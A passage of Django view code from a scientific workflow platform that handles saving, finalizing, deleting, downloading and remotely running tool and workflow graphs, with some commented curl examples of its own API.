ro = kwargs.get('ro', '')
if not ro:
return fail('Error 5476')
if not ro in ['tool', 'workflow']:
return fail('Error 5477')
action = kwargs.get('action', '')
if not action in ['FINALIZE', 'DELETE']:
return fail('Error 5475')
# Get the user
try:
obc_user = OBC_user.objects.get(user=request.user)
except ObjectDoesNotExist as e:
return fail('Error 5472')
if ro == 'tool':
tools_info_name = kwargs.get('tools_info_name', '')
if not tools_info_name:
return fail('Error 5467')
tools_info_version = kwargs.get('tools_info_version', '')
if not tools_info_version:
return fail('Error 5468')
tools_info_edit = kwargs.get('tools_info_edit', '')
if not tools_info_edit:
return fail('Error 5469')
try:
tools_info_edit = int(tools_info_edit)
except ValueError as e:
return fail('Error 5470')
# Get the tool
try:
tool = Tool.objects.get(name=tools_info_name, version=tools_info_version, edit=tools_info_edit)
except ObjectDoesNotExist as e:
return fail('Error 5471')
# Is the user who created the tool, the same as the user who wants to edit/delete it?
if not tool.obc_user == obc_user:
return fail('Error 5473')
if not tool.draft:
return fail('Error 5474')
if action == 'FINALIZE':
# Does it depend on any tool that is draft?
draft_dependencies = [t for t in tool_get_dependencies_internal(tool, include_as_root=False) if t['dependency'].draft]
if draft_dependencies:
return fail('This tool cannot be finalized. It depends from {} draft tool(s). For example: {}'.format(len(draft_dependencies), str(draft_dependencies[0]['dependency'])))
tool.draft = False
tool.save()
WJ = WorkflowJSON()
WJ.update_tool(tool)
elif action == 'DELETE':
# Is there any other tool that depends from this tool?
dependendants = Tool.objects.filter(dependencies__in=[tool])
if dependendants.count():
return fail('This tool cannot be deleted. There are {} tool(s) that depend on this tool. For example: {}'.format(dependendants.count(), dependendants.first()))
# Is there any workflow that contains this tool?
w = Workflow.objects.filter(tools__in=[tool])
if w.count():
return fail('This tool cannot be deleted. It is used in {} workflow(s). For example: {}'.format(w.count(), str(w.first())))
# Get the tools that are forks of this tool
tool_forks = Tool.objects.filter(forked_from=tool)
# Get the tool that this tool is forked from
tool_forked_from = tool.forked_from
# All the tools that are forked from this tool are now forked from the tool that this tool was forked from!
for tool_fork in tool_forks:
tool_fork.forked_from = tool_forked_from
tool_fork.save()
# Delete the comment
tool.comment.delete()
# Delete the tool
tool.delete()
return success()
elif ro == 'workflow':
workflow_info_name = kwargs.get('workflow_info_name', '')
if not workflow_info_name:
return fail('Error 5478')
workflow_info_edit = kwargs.get('workflow_info_edit', '')
if not workflow_info_edit:
return fail('Error 5479')
try:
workflow_info_edit = int(workflow_info_edit)
except ValueError as e:
return fail('Error 5480')
# Get the workflow
try:
workflow = Workflow.objects.get(name=workflow_info_name, edit=workflow_info_edit)
except ObjectDoesNotExist as e:
return fail('Error 5481')
#Is the user who created the workflow the same as the one who wants to edit/delete it?
if obc_user != workflow.obc_user:
return fail('Error 5482')
# Basic sanity check..
if not workflow.draft:
return fail('Error 5483')
if action == 'FINALIZE':
# Does it contain any tool that it is draft?
t = workflow.tools.filter(draft=True)
if t.count():
return fail('This workflow cannot be finalized. It contains {} draft tool(s). For example: {}'.format(t.count(), str(t.first())))
# Does it contain any draft workflow?
w = workflow.workflows.filter(draft=True)
if w.count():
return fail('This workflow cannot be finalized. It contains {} draft workflow(s). For example: {}'.format(w.count(), str(w.first())))
workflow.draft = False
workflow.save()
#workflow_has_changed(workflow) # Update other workflows that are using this
WJ = WorkflowJSON()
WJ.update_workflow(workflow) # TODO limit action to finalize!
elif action == 'DELETE':
# Is there any workflow that contains this workflow?
w = Workflow.objects.filter(workflows__in = [workflow])
if w.count():
return fail('This workflow cannot be deleted. It is used in {} workflow(s). For example: {}'.format(w.count(), str(w.first())))
# Get the workflows that are forks of this workflow
workflow_forks = Workflow.objects.filter(forked_from=workflow)
# Get the workflow that this workflow is forked from
workflow_forked_from = workflow.forked_from
# All the workflows that are forked from this workflow are now forked from the workflow that this workflow was forked from!
for workflow_fork in workflow_forks:
workflow_fork.forked_from = workflow_forked_from
workflow_fork.save()
# Delete the comments
workflow.comment.delete()
# Delete the workflow
workflow.delete()
return success()
def create_workflow_edge_id(source_id, target_id):
'''
ATTENTION!!!!
This should be in accordance with the javascript code: File: ui.js
/*
* Create a "unique" id for an edge
*/
function create_workflow_edge_id(source_id, target_id) {
return source_id + '..' + target_id;
}
'''
return source_id + '..' + target_id
def create_workflow_id(workflow):
'''
ATTENTION!!
This should be in accordnace with the javascript code: File: ui.js
/*
* Creates a "unique" id from a workflow
*/
function create_workflow_id(workflow) {
return workflow.name + '__' + workflow.edit; //It is ok if this is wf1__null
}
'''
if isinstance(workflow, Workflow):
return create_workflow_id({'name': workflow.name, 'edit': workflow.edit})
return workflow['name'] + '__' + str(workflow['edit'])
def set_edit_to_cytoscape_json(cy, edit, workflow_info_name):
'''
Perform the following tasks:
* Set the edit number of the workflow to all nodes/edges
* Change the id of the root workflow from "root" to workflow_info_name
'''
# Get the root workflow node
new_worfklow_node = [x for x in cy['elements']['nodes'] if x['data']['type']=='workflow' and not x['data']['edit']]
assert len(new_worfklow_node) == 1
assert new_worfklow_node[0]['data']['name'] == 'root'
# Set the edit value
new_worfklow_node[0]['data']['edit'] = edit
# Set the label value
new_worfklow_node[0]['data']['label'] = workflow_label_cytoscape(None, workflow_info_name, edit)
belongto = {
'name': workflow_info_name,
'edit': edit,
}
belongto_id = create_workflow_id(belongto)
for node in cy['elements']['nodes']:
if not node['data']['belongto'] is None:
if not node['data']['belongto']['edit']:
node['data']['belongto'] = belongto
if 'name' in node['data']:
if node['data']['name'] == 'root':
node['data']['name'] = workflow_info_name
if '__null' in node['data']['id']:
node['data']['id'] = node['data']['id'].replace('__null', '__' + str(edit))
if 'root__' in node['data']['id']:
node['data']['id'] = node['data']['id'].replace('root__', workflow_info_name + '__')
#Change the bash
if 'bash' in node['data']:
node['data']['bash'] = node['data']['bash'].replace('__null', '__' + str(edit))
node['data']['bash'] = node['data']['bash'].replace('root__', workflow_info_name + '__')
# Set to step-->Step
if 'steps' in node['data']:
for step_i, _ in enumerate(node['data']['steps']):
if '__null' in node['data']['steps'][step_i]:
node['data']['steps'][step_i] = node['data']['steps'][step_i].replace('__null', '__' + str(edit))
if 'root__' in node['data']['steps'][step_i]:
node['data']['steps'][step_i] = node['data']['steps'][step_i].replace('root__', workflow_info_name + '__')
# Set to step-->inputs
if 'inputs' in node['data']:
for input_i, _ in enumerate(node['data']['inputs']):
if '__null' in node['data']['inputs'][input_i]:
node['data']['inputs'][input_i] = node['data']['inputs'][input_i].replace('__null', '__' + str(edit))
if 'root__' in node['data']['inputs'][input_i]:
node['data']['inputs'][input_i] = node['data']['inputs'][input_i].replace('root__', workflow_info_name + '__')
# Set to step->outputs
if 'outputs' in node['data']:
for output_i, _ in enumerate(node['data']['outputs']):
if '__null' in node['data']['outputs'][output_i]:
node['data']['outputs'][output_i] = node['data']['outputs'][output_i].replace('__null', '__' + str(edit))
if 'root__' in node['data']['outputs'][output_i]:
node['data']['outputs'][output_i] = node['data']['outputs'][output_i].replace('root__', workflow_info_name + '__')
if 'edges' in cy['elements']:
for edge in cy['elements']['edges']:
if '__null' in edge['data']['source']:
edge['data']['source'] = edge['data']['source'].replace('__null', '__' + str(edit))
if 'root__' in edge['data']['source']:
edge['data']['source'] = edge['data']['source'].replace('root__', workflow_info_name + '__')
if '__null' in edge['data']['target']:
edge['data']['target'] = edge['data']['target'].replace('__null', '__' + str(edit))
if 'root__' in edge['data']['target']:
edge['data']['target'] = edge['data']['target'].replace('root__', workflow_info_name + '__')
if '__null' in edge['data']['id']:
edge['data']['id'] = create_workflow_edge_id(edge['data']['source'], edge['data']['target'])
def check_workflow_step_main(cy, root_workflow):
'''
It should be one and only one main step on the main workflow
'''
main_counter = 0
for node in cy['elements']['nodes']:
if node['data']['type'] == 'step':
if node['data']['belongto'] == root_workflow:
if node['data']['main']:
main_counter += 1
return main_counter
@has_data
def workflows_add(request, **kwargs):
'''
add workflow, workflow add, save workflow, workflow save, save wf
edit workflow edit update workflow
'''
if request.user.is_anonymous: # Server should always check..
return fail('Please login to create new workflow')
if not user_is_validated(request):
return fail('Please validate your email to create new workflows ' + validate_toast_button());
obc_user = OBC_user.objects.get(user=request.user)
workflow_info_name = kwargs.get('workflow_info_name', '')
if not workflow_info_name.strip():
return fail('Invalid workflow name')
workflow_info_forked_from = kwargs['workflow_info_forked_from'] # If it does not exist, it should raise an Exception
workflow_edit_state = kwargs.get('workflow_edit_state', '')
if not type(workflow_edit_state) is bool:
return fail('Error 4877')
upvoted = False
downvoted = False
workflow_forked_from = None
workflow_changes = None
if workflow_edit_state:
# We are editing this workflow
# Get the edit
workflow_info_edit = kwargs.get('workflow_info_edit', '')
# Is this an int?
try:
workflow_info_edit = int(workflow_info_edit)
except ValueError as e:
return fail('Error 4878')
# Does this workflow exist?
try:
w = Workflow.objects.get(name=workflow_info_name, edit=workflow_info_edit)
except ObjectDoesNotExist as e:
return fail('Error 4879')
# Basic sanity check. We shouldn't be able to edit a workflow which is not a draft..
if not w.draft:
return fail('Error 4880')
# Is the creator of the workflow the same as the user who edits it?
if obc_user != w.obc_user:
return fail('Error 4881')
# Store a reference to the comments
comment = w.comment
# Store upvotes/downvotes
upvotes = w.upvotes
downvotes = w.downvotes
# Store votes
votes = UpDownWorkflowVote.objects.filter(workflow=w)
# Disassociate from this tool and get upvoted/downvoted status
for vote in votes:
if vote.obc_user == obc_user:
upvoted = vote.upvote
downvoted = not upvoted
vote.workflow = None
vote.save()
# Get the workflows that are forks of this workflow
workflow_forks = Workflow.objects.filter(forked_from=w)
# Temporary set that these workflows are not forked from any workflow
for workflow_fork in workflow_forks:
workflow_fork.forked_from = None
workflow_fork.save()
# Get the workflow that this workflow is forked from
workflow_forked_from = w.forked_from
# Get the created at. It needs to be sorted according to this, otherwise the jstree becomes messy
workflow_created_at = w.created_at
# Get the workflows that use this workflow
workflows_using_this_workflow = Workflow.objects.filter(workflows__in = [w])
# Remove this workflow from these workflows
for workflow_using_this_workflow in workflows_using_this_workflow:
workflow_using_this_workflow.workflows.remove(w)
workflow_using_this_workflow.save()
# Delete it!
w.delete()
else:
# This is a new workflow
upvotes = 0
downvotes = 0
workflow_changes = kwargs.get('workflow_changes', None)
if workflow_info_forked_from:
if not workflow_changes:
return fail('Edit Summary cannot be empty')
workflow_forked_from = Workflow.objects.get(name=workflow_info_forked_from['name'], edit=workflow_info_forked_from['edit'])
else:
pass # Do nothing
workflow_website = kwargs.get('workflow_website', '')
if workflow_website:
if not valid_url(workflow_website):
return fail('website is not a valid URL')
workflow_description = kwargs.get('workflow_description', '')
if not workflow_description.strip():
return fail('Description cannot be empty')
workflow_description_html = markdown(workflow_description)
workflow = kwargs.get('workflow_json', '')
#print ('Workflow from angular:')
#print (simplejson.dumps(workflow, indent=4))
if not workflow:
return fail ('workflows json object is empty') # This should never happen!
if not workflow['elements']:
return fail('workflow graph cannot be empty')
# Client sents the root workflow node.
# When we save we make root False so that it is easier to import it later
#workflow_root_node = [x for x in workflow['elements']['nodes'] if x['data']['type']=='workflow' and x['data']['root']]
#if len(workflow_root_node) != 1:
# return fail('Error 28342')
#workflow_root_node[0]['data']['root'] = False
#Check that one and only one step is main
if workflow_edit_state:
next_edit = workflow_info_edit
else:
#Get the maximum version. FIXME DUPLICATE CODE
workflow_all = Workflow.objects.filter(name__iexact=workflow_info_name)
if not workflow_all.exists():
next_edit = 1
else:
max_edit = workflow_all.aggregate(Max('edit'))
next_edit = max_edit['edit__max'] + 1
#Change the edit value in the cytoscape json object
set_edit_to_cytoscape_json(workflow, next_edit, workflow_info_name)
# print ('Workflow from set_edit:')
# print (simplejson.dumps(workflow, indent=4))
#print (simplejson.dumps(workflow, indent=4))
main_counter = check_workflow_step_main(workflow, {'name':workflow_info_name, 'edit': next_edit })
if main_counter == 0:
return fail('Could not find main step. One step needs to be declared as "main"')
if main_counter > 1:
return fail('Error 49188') # This should never happen
new_workflow = Workflow(
obc_user=obc_user,
name = workflow_info_name,
edit = next_edit,
website = workflow_website,
description = workflow_description,
description_html = workflow_description_html,
# FIXME !! SERIOUS!
# This is redundand. We do json.loads and then json.dumps.
# On the other hand, how else can we check if elements are not empty? (perhaps on the backend..)
workflow = simplejson.dumps(workflow),
forked_from = workflow_forked_from,
changes = workflow_changes,
upvotes = upvotes,
downvotes = downvotes,
draft = True, # We always save new workflows as draft.
)
#Save it
new_workflow.save()
if workflow_edit_state:
# Preserve the created at date. We have to do that AFTER the save! https://stackoverflow.com/questions/7499767/temporarily-disable-auto-now-auto-now-add
new_workflow.created_at = workflow_created_at
new_workflow.save()
# Get all tools that are used in this workflow except the ones that are disconnected
tool_nodes = [x for x in workflow['elements']['nodes'] if (x['data']['type'] == 'tool') and (not x['data']['disconnected'])]
tools = [Tool.objects.get(name=x['data']['name'], version=x['data']['version'], edit=x['data']['edit']) for x in tool_nodes]
if tools:
new_workflow.tools.add(*tools)
new_workflow.save()
# Get all workflows that are used in this workflow
workflow_nodes = [x for x in workflow['elements']['nodes'] if x['data']['type'] == 'workflow']
# print (simplejson.dumps(workflow_nodes, indent=4))
# Remove self workflow and workflows that are disconnected
workflow_nodes = [
{'name': x['data']['name'], 'edit': x['data']['edit']}
for x in workflow_nodes if
(not (x['data']['name'] == workflow_info_name and x['data']['edit'] == next_edit)) and (not x['data']['disconnected'])
]
# Get workflow database objects
workflows = [Workflow.objects.get(**x) for x in workflow_nodes]
if workflows:
new_workflow.workflows.add(*workflows)
new_workflow.save()
# Add keywords
keywords = [Keyword.objects.get_or_create(keyword=keyword)[0] for keyword in kwargs['workflow_keywords']]
new_workflow.keywords.add(*keywords)
new_workflow.save();
obc_user = OBC_user.objects.get(user=request.user)
if workflow_edit_state:
# Add the votes from the previous edit
for vote in votes:
vote.workflow = new_workflow
vote.save()
# Add the workflows that were forked from this workflow (that was deleted before) to the new workflow
for workflow_fork in workflow_forks:
workflow_fork.forked_from = new_workflow
workflow_fork.save()
# Add to the workflows that were using this workflow, the new workflow
for workflow_using_this_workflow in workflows_using_this_workflow:
#print ('Workflow using this workflow:', str(workflow_using_this_workflow))
workflow_using_this_workflow.workflows.add(new_workflow)
workflow_using_this_workflow.save()
# Update the json graph to the workflows that are using me
WJ = WorkflowJSON()
WJ.update_workflow(new_workflow)
else:
# Add an empty comment. This will be the root comment for the QA thread
comment = Comment(
obc_user = obc_user,
comment = '',
comment_html = '',
title = markdown('Discussion on Workflow: w/{}/{}'.format(workflow_info_name, next_edit)),
parent = None,
upvotes = 0,
downvotes = 0,
)
comment.save()
new_workflow.comment = comment
new_workflow.save()
#print ('AFTER SAVE:')
#print (simplejson.dumps(simplejson.loads(new_workflow.workflow), indent=4))
ret = {
'description_html': workflow_description_html,
'edit': next_edit,
'created_at': datetime_to_str(new_workflow.created_at),
'score': upvotes-downvotes,
'voted': {'up': upvoted, 'down': downvoted},
'workflow_pk': new_workflow.pk, # Used in comments
'workflow_thread': qa_create_thread(new_workflow.comment, obc_user), # Tool comment thread
}
return success(ret)
@has_data
def workflows_search_3(request, **kwargs):
'''
This is triggered when a user drags a workflow from the jstree and drops it in a current workflow
'''
workflow_name = kwargs['workflow_name']
workflow_edit = kwargs['workflow_edit']
workflow = Workflow.objects.get(name__iexact = workflow_name, edit=workflow_edit)
# Get current obc_user
if request.user.is_anonymous:
obc_user = None
else:
obc_user = OBC_user.objects.get(user=request.user)
#Is it voted?
if obc_user:
try:
v = UpDownWorkflowVote.objects.get(obc_user=obc_user, workflow=workflow)
except ObjectDoesNotExist as e:
# It is not voted
workflow_voted = {'up': False, 'down': False}
else:
# It is noted
workflow_voted = {'up': v.upvote, 'down': not v.upvote}
else:
workflow_voted = {'up': False, 'down': False}
ret = {
'username': workflow.obc_user.user.username,
'website': workflow.website,
'description': workflow.description,
'description_html': workflow.description_html,
'created_at': datetime_to_str(workflow.created_at),
'forked_from': workflow_to_json(workflow.forked_from),
'keywords': [keyword.keyword for keyword in workflow.keywords.all()],
'workflow' : simplejson.loads(workflow.workflow),
'changes': workflow.changes,
'workflow_pk': workflow.pk, # Used in comments (QAs)
'workflow_thread': qa_create_thread(workflow.comment, obc_user), # Workflow comment thread
'workflow_score': workflow.upvotes - workflow.downvotes,
'workflow_voted': workflow_voted,
'workflow_comment_id': workflow.comment.pk, # Used to create a permalink to the comments
'workflow_comment_title': workflow.comment.title,
'workflow_comment_created_at': datetime_to_str(workflow.comment.created_at),
'workflow_comment_username': workflow.comment.obc_user.user.username,
'draft': workflow.draft, # Is this a draft workflow?
}
return success(ret)
def workflow_node_cytoscape(workflow, name='root', edit=0):
'''
Create a cytoscape workflow node
Normally it should take a database workflow object and create a cytoscape node
Now it just creates a root workflow cytoscape node
'''
assert not workflow # Not yet implemented
return {
'data': {
'belongto': None,
'edit': edit,
'id': workflow_id_cytoscape(workflow, name, edit),
'label': workflow_label_cytoscape(workflow, name, edit),
'name': name,
'type': 'workflow',
'draft': False, # For consistency. It does not realy makes any difference
'disconnected': False, # For consistency as well.
}
}
def tool_node_cytoscape(tool, tool_depending_from_me=None):
'''
Create a cytoscape tool node
tool: A database object tool node
tool_depending_from_me: If i was added as a dependency, this should be the tool that depends from me. FIXME: REMOVE THIS
'''
if isinstance(tool, Tool):
return {
'data': {
'belongto': {'name': 'root', 'edit': 0},
'dep_id' : tool_id_cytoscape(tool_depending_from_me) if tool_depending_from_me else '#', # Not used in executor
'edit': tool.edit,
'id': tool_id_cytoscape(tool),
'label': tool_label_cytoscape(tool),
'name': tool.name,
'root': 'yes' if tool_depending_from_me else 'no', # Not used in executor. 'yes/no' should be True/False for Christ sake! FIXME
'text': tool_label_cytoscape(tool),
'type': 'tool',
'variables': [{'description': variable.description, 'name': variable.name, 'type': 'variable', 'value': variable.value} for variable in tool.variables.all()],
'installation_commands': tool.installation_commands,
'validation_commands': tool.validation_commands,
'os_choices': [choice.os_choices for choice in tool.os_choices.all()],
'dependencies': [str(t) for t in tool.dependencies.all()],
'version': tool.version,
'draft': tool.draft,
}
}
elif type(tool) is dict:
return {
'data': {
'belongto': {'name': 'root', 'edit': 0},
'dep_id' : tool_id_cytoscape(tool_depending_from_me) if tool_depending_from_me else '#', # See comment above. Not used in executor
'edit': tool['edit'],
'id': tool_id_cytoscape(tool),
'label': tool_label_cytoscape(tool),
'name': tool['name'],
'root' : 'yes' if tool_depending_from_me else 'no', # Not used in executor,
'text': tool_label_cytoscape(tool),
'type': 'tool',
'variables': [{'description': variable['description'], 'name': variable['name'], 'type': 'variable', 'value': variable['value']} for variable in tool['variables']],
'version': tool['version'],
'draft': tool['draft'],
'installation_commands': tool['installation_commands'],
'validation_commands': tool['validation_commands'],
'os_choices': tool['os_choices'],
'dependencies': tool['dependencies'],
}
}
def step_node_cytoscape(name='main'):
'''
Create a cytoscape step node
'''
return {
'data': {
'bash': '',
'belongto': {'name': 'root', 'edit': 0},
'id': step_id_cytoscape('main', None, 'root', None),
'label': step_id_label('main'),
'inputs': [],
'outputs': [],
'steps': [],
'tools': [],
'main': True,
'name': step_id_label('main'),
'sub_main': False,
'type': 'step',
}
}
def edge_cytoscape(source, target):
'''
Create a cytscape edge object
'''
return {
'data': {
'source': source['data']['id'],
'target': target['data']['id'],
'id': create_workflow_edge_id(source['data']['id'], target['data']['id']),
},
'position': {
'x': 0,
'y': 0,
},
'group': 'edges',
'removed': False,
'selected': False,
'selectable': True,
'locked': False,
'grabbable': True,
'classes': '',
}
@has_data
def download_tool(request, **kwargs):
'''
Create a cytoscape workflow that installs a given tool.
Kind of a "fake" workflow that the only thing that it does is install a tool (and its dependencies)
It is called by download_workflow when the user selects to "download" a tool instead of a workflow
'''
workflow = {
'elements': {
'nodes': [],
'edges': [],
}
}
# Add root workflow
workflow_node = workflow_node_cytoscape(None)
workflow['elements']['nodes'].append(workflow_node)
# this does not contain recursively all the dependencies. Only the first level
root_tool_dependencies = kwargs['tool_dependencies']
root_tool_objects = [Tool.objects.get(name=t['name'], version=t['version'], edit=t['edit']) for t in root_tool_dependencies]
all_dependencies_str = list(map(str, root_tool_objects))
# Add this tool
tool = {
'name': str(kwargs['tools_search_name']) if str(kwargs['tools_search_name']) else 'T',
'version': str(kwargs['tools_search_version']) if str(kwargs['tools_search_version']) else '0',
'edit': kwargs['tools_search_edit'] if kwargs['tools_search_edit'] else 0, # If this is editable, then the edit is 0
'variables': [variable for variable in kwargs['tool_variables'] if variable['name'] and variable['value'] and variable['description']],
'draft': kwargs['tool_draft'],
'installation_commands': kwargs['tool_installation_commands'],
'validation_commands': kwargs['tool_validation_commands'],
'os_choices': kwargs['tool_os_choices'],
'dependencies': all_dependencies_str,
}
this_tool_cytoscape_node = tool_node_cytoscape(tool)
#print (this_tool_cytoscape_node)
workflow['elements']['nodes'].append(this_tool_cytoscape_node)
# Add an edge between the root workflow and this tool
workflow['elements']['edges'].append(edge_cytoscape(workflow_node, this_tool_cytoscape_node))
# build all tool nodes for dependency tools
all_ids = set()
all_dependencies_str = []
for root_tool_obj in root_tool_objects:
# This is a first level dependency
root_tool_node = tool_node_cytoscape(root_tool_obj)
# Get all dependencies recursively for this tool
root_tool_all_dependencies = tool_get_dependencies_internal(root_tool_obj, include_as_root=True)
for root_tool_all_dependency in root_tool_all_dependencies:
# For each dependency create a cytoscape node
cytoscape_node = tool_node_cytoscape(root_tool_all_dependency['dependency'])
if not cytoscape_node['data']['id'] in all_ids: # An id should exist only once in the graph.... FIXME all_ids is always empty!
workflow['elements']['nodes'].append(cytoscape_node)
# Connect this tool with its dependent tool node
if root_tool_all_dependency['dependant']:
workflow['elements']['edges'].append(edge_cytoscape(cytoscape_node, tool_node_cytoscape(root_tool_all_dependency['dependant'])))
else:
# This is a dependency of the root tool!
workflow['elements']['edges'].append(edge_cytoscape(cytoscape_node, this_tool_cytoscape_node))
# Create a step node
step_node = step_node_cytoscape('main')
workflow['elements']['nodes'].append(step_node)
# Connect it with the root workflow
workflow['elements']['edges'].append(edge_cytoscape(workflow_node, step_node))
return download_workflow(request, **{
'workflow_options': {},
'workflow': None,
'download_type': kwargs.get('download_type', 'BASH'),
'workflow_cy': workflow,
'workflow_info_editable': False,
})
@has_data
def download_workflow(request, **kwargs):
'''
Defined in urls.py:
path('download_workflow/', views.download_workflow), # Acceps a workflow_options and workflow object. Runs a workflow
https://docs.djangoproject.com/en/2.2/ref/request-response/#telling-the-browser-to-treat-the-response-as-a-file-attachment
kwargs['workflow'] = {'name': <workflow_name>, 'edit': <workflow_edit>}
kwargs['workflow_cy'] is the cytoscape workflow
Note: Everyone can download a workflow!
'''
workflow_arg = kwargs['workflow']
workflow_options_arg = kwargs['workflow_options']
download_type = kwargs['download_type'] # For a full list of types see below . if download_type == ...
workflow_info_editable = kwargs['workflow_info_editable'] # IS this workflow saved or not ? . TRUE: NOT SAVED
workflow_id = kwargs.get('workflow_id')
workflow_obc_client = kwargs.get('obc_client', False)
#print ('Name:', workflow_arg['name'])
#print ('Edit:', workflow_arg['edit'])
#print ('editable:', workflow_info_editable)
if workflow_info_editable:
# This workflow has not been saved!
workflow = kwargs.get('workflow_json', '')
workflow_name = workflow_arg.get('name', '')
if not workflow_name:
workflow_name = 'W'
workflow_edit = 0
set_edit_to_cytoscape_json(workflow, workflow_edit, workflow_name)
main_counter = check_workflow_step_main(workflow, {'name':workflow_name, 'edit': workflow_edit})
if main_counter == 0:
return fail('Could not find main step. One step needs to be declared as "main"')
if main_counter > 1:
return fail('Error 49188') # This should never happen
workflow_cy = workflow
workflow = None
elif workflow_arg:
# This is a workflow saved
workflow = Workflow.objects.get(**workflow_arg)
workflow_cy = simplejson.loads(workflow.workflow)
else:
# This is a tool
workflow = None
workflow_cy = kwargs['workflow_cy']
#print (workflow_cy)
# Create a new Report object
if (not user_is_validated(request)) or (not workflow) or (workflow.draft):
'''
If :
user is anonymous or
with non-validated email or
not saved workflow or
this is a tool run (workflow is None) or
workflow is draft
then:
we do not create a report!
'''
run_report = None
nice_id = None
token = None
report_created = False # Do we create a report upon execution of this workflow?
else:
run_report = Report(
obc_user = OBC_user.objects.get(user=request.user),
workflow = workflow,
)
# Attach a new report_id to it
run_report.save()
nice_id = str(run_report.nice_id)
report_token = ReportToken(status=ReportToken.UNUSED, active=True)
report_token.save()
#print ('Report ID:')
#print (report_id)
run_report.tokens.add(report_token)
run_report.save()
token = str(report_token.token)
report_created = True
output_object = {
'arguments': workflow_options_arg,
'workflow': workflow_cy,
'token': token,
'nice_id': nice_id,
}
#output_object = simplejson.dumps(output_object) # .replace('#', 'aa')
#output_object = escape(simplejson.dumps(output_object))
#print ('output_object')
#print (output_object)
#response = HttpResponse(the_script, content_type='application/x-sh')
#response['Content-Disposition'] = 'attachment; filename="script.sh"'
ret = {}
server_url = get_server_url(request)
try:
if download_type == 'JSON':
output_object = urllib.parse.quote(simplejson.dumps(output_object))
ret['output_object'] = output_object
elif download_type == 'BASH':
output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'sh'))
ret['output_object'] = output_object
elif download_type == 'CWLTARGZ':
output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'cwltargz'))
ret['output_object'] = output_object
elif download_type == 'CWLZIP':
output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'cwlzip',))
ret['output_object'] = output_object
elif download_type == 'AIRFLOW':
output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'airflow', workflow_id=workflow_id, obc_client=workflow_obc_client))
ret['output_object'] = output_object
except OBC_Executor_Exception as e:
return fail(str(e))
ret['report_created'] = report_created
ret['nice_id'] = nice_id
return success(ret)
def callback_url(request):
'''
Buld callbacl url
'''
return f'{request.scheme}://{request.META['HTTP_HOST']}/platform/'
@has_data
def run_workflow(request, **kwargs):
'''
path('run_workflow/', view.run_workflow)
curl -H "Content-Type: application/json" --request POST --data '{"type":"workflow","name":"test", "edit": "2"}' "http://139.91.81.103:5000/3ee5ccfb744983968fb3e9735e4bb85d/run_workflow"
source: Where the request came from. If it from rest then source='frontend'
'''
if request.user.is_anonymous: # Server should always check..
return fail('Error 3291. User is anonymous')
if not user_is_validated(request):
return fail('Error 3292. User is not validated ' + validate_toast_button());
obc_user = OBC_user.objects.get(user=request.user)
profile_name = kwargs.get('profile_name', '')
if not str(profile_name):
return fail('Error 3288. Invalid profile name')
name = kwargs.get('name', '')
if not str(name):
return fail('Error 3289. Invalid workflow name')
edit = kwargs.get('edit', '')
try:
edit = int(edit)
except ValueError as e:
return fail('Error 3290. Invalid workflow edit')
# Get the client
try:
client = obc_user.clients.get(name=profile_name)
except ObjectDoesNotExist as e:
return fail('Error 3293. Could not get execution client.')
# Get the workflow
try:
workflow = Workflow.objects.get(name=name, edit=edit)
except ObjectDoesNotExist as e:
return fail('Error 3294. Could not get Workflow object.')
url = client.client
#print ('URL FROM DATABASE:', url)
run_url = urllib.parse.urljoin(url + '/', 'run') # https://stackoverflow.com/questions/8223939/how-to-join-absolute-and-relative-urls
nice_id = create_nice_id()
data_to_submit = {
'type': 'workflow',
'name': name,
'edit': edit,
'callback': callback_url(request),
'workflow_id': nice_id,
}
headers={ "Content-Type" : "application/json", "Accept" : "application/json"}
#print ('run_url:', run_url)
#print ('callback:', data_to_submit['callback'])
'''
'''
'''
curl --header "Content-Type: application/json" \
--request GET \
http://139.91.190.239:5000/cfa52d9df5a24345d9f740395e4e69e4/check/id/test
[{"dag_id": "mitsos", "dag_run_url": "/admin/airflow/graph?dag_id=mitsos&execution_date=2020-02-28+13%3A16%3A42%2B00%3A00", "execution_date": "2020-02-28T13:16:42+00:00", "id": 2, "run_id": "manual__2020-02-28T13:16:42+00:00", "start_date": "2020-02-28T13:16:42.710933+00:00", "state": "success"}, {"dag_id": "mitsos", "dag_run_url": "/admin/airflow/graph?dag_id=mitsos&execution_date=2020-02-28+13%3A20%3A44%2B00%3A00", "execution_date": "2020-02-28T13:20:44+00:00", "id": 3, "run_id": "manual__2020-02-28T13:20:44+00:00", "start_date": "2020-02-28T13:20:44.423814+00:00", "state": "success"}, {"dag_id": "mitsos", "dag_run_url": "/admin/airflow/graph?dag_id=mitsos&execution_date=2020-02-28+13%3A24%3A02%2B00%3A00", "execution_date": "2020-02-28T13:24:02+00:00", "id": 4, "run_id": "manual__2020-02-28T13:24:02+00:00", "start_date": "2020-02-28T13:24:02.486982+00:00", "state": "success"}]
'''
# !!!HIGLY EXPERIMENTAL!!!
try:
r = requests.post(run_url, headers=headers, data=simplejson.dumps(data_to_submit))
except requests.exceptions.ConnectionError as e:
return fail('Could not establish a connection with client')
if not r.ok:
#r.raise_for_status()
return fail('Could not send to URL: {} . Error code: {}'.format(run_url, r.status_code))
try:
data_from_client = r.json()
except Exception as e: # Ideally we should do here: except json.decoder.JSONDecodeError as e: but we would have to import json with simp[lejson..]
return fail('Could not parse JSON data from Execution Client.')
#print ('RUN_URL:')
#print (data_from_client)
# Check data_from_client. We expect to find an externally triggered True in data_from_client['status']['message']
if not 'status' in data_from_client:
return fail('Client does not contains status info')
if not 'message' in data_from_client['status']:
return fail("Client's status does not contain any message")
if not 'externally triggered: True' in data_from_client['status']['message']:
return fail("Client failed to trigger DAG: {}".format(data_from_client['status']['message']))
if not 'executor_url' in data_from_client:
return fail("Could not get workflow monitoring URL..")
visualization_url = g['create_client_airflow_url'](data_from_client['executor_url'], nice_id)
if not 'monitor_url' in data_from_client:
return fail('Could not get monitoring URL..')
monitor_url = data_from_client['monitor_url']
# All seem to be ok. Create a report
report = Report(
obc_user=obc_user,
workflow = workflow,
nice_id = nice_id,
client=client,
visualization_url=visualization_url,
monitor_url = monitor_url,
client_status='SUBMITTED')
report.save()
# Let's not create a reporttoken for now.
ret = {
'nice_id': nice_id,
}
return success(ret)
@csrf_exempt
@has_data
def report(request, **kwargs):
'''
called from executor
'''
#print (kwargs)
token = kwargs.get('token', None)
if not token:
return fail('Could not find token field')
#print ('token: {}'.format(token))
